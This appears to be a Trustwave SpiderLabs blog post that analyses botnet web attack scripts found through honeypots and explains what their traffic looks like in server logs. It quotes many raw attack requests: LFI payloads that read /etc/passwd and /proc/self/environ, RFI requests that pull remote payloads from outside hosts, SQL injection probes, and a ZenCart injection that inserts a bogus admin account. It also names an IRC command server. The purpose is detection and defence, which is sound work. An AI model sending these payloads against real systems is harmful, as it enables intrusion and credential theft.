Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

[Honeypot Alert] Inside the Attacker's Toolbox: Botnet Web Attack Scripts

Have you ever wondered what script/code/tool was behind the automated web attacks that you see in your web server log files? This blog post will shed some light on one of the most common tactics used by web attackers: Botnet Web Attack Scripts.

Attack Sources: Compromised Web Servers

What we are finding when analyzing attacking IP address (as part of our IP Reputation data feed for the commercial ModSecurity rules) is that a large portion of these attacking sources are actually compromised web servers. Attackers are exploiting various web application vulnerabilities through attacks such as RFI to download and execute attacker code.

Trustwave SpiderLabs Research Team has obtained a large number of scripts and tools from these attack source websites and analyzed their capabilities. Let't take a look at some common functionality.

Botnet Clients

If the RFI attack succeeds, then botnet client code will usually log into an IRC channel from the web server host.

12731_f635fa9a-a800-409a-82ce-79ea6a351e97

This section of code shows how the botnet client will hide itself within the log process table (ps) listing by looking like an apache httpd process. It will log into a specific IRC server (irc.priv8.in) on a specific port (6667) and access the #norman channel.

Identify Targets: Search Engine Queries

Once the client is logged into the IRC channel, the operator can send commands for the client to execute. Such as to run Search Engine queries to identify other vunerable web servers. Here is a list of Search Engines that they will use:

12478_eb6e7cd8-68ee-4c37-ab1a-5267c7c235f4

Local File Inclusion (lfi) Attacks

Here is a snippet of the "lfi" function that will take the Search Engine queries and executes various exploit payloads. Notice the bolded sections some example LFI attack payloads:

10877_9e05e6e2-3043-4ea5-a88e-4332fe187543

We have seen these attacks before in our honeypots:

GET /cart.php?a=antisec&templatefile=../../../../../../../../../../../../../../../etc/passwd%0000 HTTP/1.1GET /cart.php?a=psxteam&templatefile=../../../../../../../../../../../../../../../etc/passwd%0000 HTTP/1.1GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1GET /cart.php?a=add%26amp%3Bdomain%3Dtransfer%2Fcart.php%3Fa%3Dantisec&templatefile=../../../configuration.php%0000 HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=/proc/self/environ HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=../../../../../../../../../../../../../../../../../../../proc/self/environ%0000 HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=/proc/self/environ%0000 HTTP/1.1GET //components/com_simpleboard/file_upload.php?sbp=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1

Remote File Inclusion (rfi) Attacks

Here is a snippet of the !rfi function that will attempt remote file inclusion attacks:

11103_a8fba2be-9ede-46fb-a003-fa1957e1e3d1

Here is how these attacks looks when received by our honeypots:

GET /admin///?_zb_path=http://www.REDACTED.de/plugins/rik.jpg?? HTTP/1.1GET /admin//?_zb_path=http://www.REDACTED.com/uccl-sy/images/byroe.jpg?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/black.jpg?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/daster.jpg?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j1.txt?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j2.txt?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/j3.txt?? HTTP/1.1GET //appserv/main.php?appserv_root=http://REDACTED.co.uk/maho/topi.jpg?? HTTP/1.1GET //ask_password.php?dir=http://www.REDACTED.hu/e107_images/fileinspector/banner.jpg??? HTTP/1.1GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.REDACTED.com.br/v3/pgm//common/metabase/id.gif?????????????? HTTP/1.1GET /bad_link.php?theme_path=http://REDACTED.kr/bbs//icon/dd--.gif?????? HTTP/1.1GET /bad_link.php?theme_path=http://www.REDACTED.gov.tw//appserv/c2d.gif????? HTTP/1.1GET /bad_link.php?theme_path=?src=http://REDACTED.com.airatrip.com/temp/phantom.php HTTP/1.1GET //bbs///////delete_all.php?board_skin_path=http://www.REDACTED.org/wp-content/languages/zfxid1.txt??? HTTP/1.1

SQL Injection (sqli) Attacks

Here is a snippet of the !sqli function that executes SQL Injection attacks:

8315_225a9333-c128-47c8-9144-2c8113bf49a5

The attacks simply append a single quote character to various parameter fields and then inspect the response html for signs of SQL related error messages. Here is how these attacks look in our honeypot logs:

GET /index.php?keyword=' HTTP/1.1GET //log.php?id=' HTTP/1.1GET /logs/error_log/submitComment.php?DOCUMENT_ROOT=' HTTP/1.1GET /logs/submitComment.php?DOCUMENT_ROOT=' HTTP/1.1GET //mail.php?id=' HTTP/1.1GET /order.php?id=' HTTP/1.1GET /osc/shopping_cart.php?id=' HTTP/1.1GET /page.php?id=' HTTP/1.1GET /product.php?id=' HTTP/1.1GET /produto.php?id=' HTTP/1.1GET /shop.php?id=' HTTP/1.1GET /shopping_cart.php?cadid=' HTTP/1.1GET /shopping_cart.php?pid=' HTTP/1.1GET /submitComment.php?DOCUMENT_ROOT=' HTTP/1.1GET //upload.php?id=' HTTP/1.1

ZenCart Attacks

Here is a snippet of the !zen function that executes attacks against ZenCart vulnerabilities:

9652_651b5185-81ad-442a-b83e-51e168d7b03e
This section of code attempts to use SQL Injection to insert bogus admin user account data. Here is how these attacks look when they are received by our honeypots:

POST /store//admin/sqlpatch.php/password_forgotten.php?action=execute...query_string=insert into admin (admin_id, admin_name, admin_email, admin_pass) values (30, 'wew', 'antisux.com', '617ec22fbb8f201c366e9848c0eb6925:87');

Failed Botnet Attack Commands

When an attacker wants to execute a specific type of attack, they will issue commands from the IRC botnet channel using this syntax - > !cmd. Here is a sampling of the functions available:

11449_b9a25f7e-855a-4d0a-bfbd-3d100ceef76d

Notice the syntax of using the exclamation point (!) before the function name. While reviewing the honeypot/sensor logs, we see a fair amount of examples where the attack code is not properly executing the function call but instead just sending the text in the live HTTP requests. Here are some examples:

69.65.40.230 - - [10/May/2012:07:34:36 -0400] "GET /!lfi../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 404 259 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"188.165.237.143 - - [01/Apr/2012:15:03:18 +0900] "GET /!rfitest?? HTTP/1.1" 404 214
188.165.237.143 - - [01/Apr/2012:15:03:20 +0900] "GET /!rfihttp://kortech.cn/bbs//skin/zero_vote/fx29id2.txt???? HTTP/1.1" 404 25946.105.99.149 - - [24/Jan/2012:08:10:04 +0100] "GET /!sql' HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"96.250.100.147 - - [14/Mar/2012:07:07:42 +0900] "POST /!zen HTTP/1.1" 404 284

If you see these types of requests within your log file, you can be assured that a botnet client is attacking your site.

Web Protections

While secure coding priciples are always the first line of defense against these types of injection-based attacks, the fact is that the majority of these attacks are targeting 3rd party applications. This means that the web sites running these applications did not write them and therefore are reliant upon the product developers to release updates to fix the vulnerabilities. It is paramount that organizations keep up-to-date on patch updates and upgrades and get them install as soon as possible.

In this scenario, a Web Application Firewall (WAF) is a great protection mechanism. Trustwave's WAF customers (WebDefend and ModSecurity) are protected against these types of attacks.

Latest SpiderLabs Blogs

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More

Breakdown of Tycoon Phishing-as-a-Service System

Just weeks after Trustwave SpiderLabs reported on the Greatness phishing-as-a-service (PaaS) framework, SpiderLabs’ Email Security team is tracking another PaaS called Tycoon Group.

Read More